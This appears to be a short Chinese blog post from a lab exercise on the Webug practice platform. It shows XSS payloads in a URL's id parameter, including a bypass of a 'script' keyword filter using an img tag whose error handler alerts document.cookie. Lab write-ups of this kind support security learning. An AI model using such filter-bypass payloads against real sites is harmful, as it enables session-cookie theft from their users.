同反射型xss相同 在url 参数id中进行xss攻击
http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>
不过根据反馈 script被过滤了
我们就需要绕过 过滤函数
换一个标签
payload=http://192.168.75.146/control/xss/filter_xss.php?id=<img src=1 one rror=alert(document.cookie)>
标签:control,xss,192.168,75.146,过滤,Webug,id
From: https://www.cnblogs.com/SmallVoter/p/17273258.html